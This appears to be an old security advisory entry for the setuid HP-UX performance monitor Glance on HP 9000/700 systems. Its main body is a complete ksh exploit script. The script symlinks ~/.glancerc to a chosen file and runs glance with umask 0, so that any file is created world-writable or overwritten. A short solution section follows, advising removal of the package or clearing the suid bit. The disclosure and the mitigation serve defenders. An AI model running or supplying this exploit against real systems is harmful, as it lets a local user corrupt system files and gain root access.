COMMAND

    /usr/perf/bin/glance

SYSTEMS AFFECTED

    HP 9000/700

PROBLEM
    Here's another exploit code regarding glance:

    #!/bin/ksh
    # the one .traz

    FILE=$1
    PROGGIE=`basename $0`
    GLANCE=/usr/perf/bin/glance

    if [ -z "$1" ]
    then
      echo "usage: $PROGGIE file_to_create_or_overwrite"
      exit
    fi

    if [ -f ~/.glancerc ]
    then
      mv ~/.glancerc ~/.glancerc.old
    fi

    umask 0
    ln -s $FILE ~/.glancerc
    if [ -f $FILE ]
    then
      echo "File exists -- will be overwritten with garbage"
    else
      echo "File doesn't exist -- will be created mode 666"
      CREATE_666="yes"
    fi
    echo "Please wait about 10 seconds or so"
    ${GLANCE} -j 1 -iterations 1 > /dev/null 2>&1
    if [ -n "${CREATE_666}" ]
    then
      >$FILE
    fi

    rm ~/.glancerc
    if [ -f ~/.glancerc.old ]
    then
      mv ~/.glancerc.old ~/.glancerc
    fi

SOLUTION

    Glance Plus  is a  performance monitor  that is  included in  most
    HP-UX system installations as a  demo package or can be  purchased
    separately.  If  you  do  not   need  to  do  system   performance
    monitoring, you  should remove  this whole  package which includes
    all the  files in  /usr/perf. An  earlier problem  with Glance was
    covered in  the HP  Security Advisory  9405-011 which  describes a
    patch that updates Glance to version B.09.01 (700-800) or  A.09.07
    (300,  400).   The  current  vulnerability  is  not fixed by these
    updates.  If you need to keep this package, you should change  the
    permissions of  all the  files in  /usr/perf to  owner only access
    and clear the suid  bit. Check that the  files are owned by  root.
    Normal users will no  longer be able to  use this program but  the
    system manager will be able to do so when logged in as root.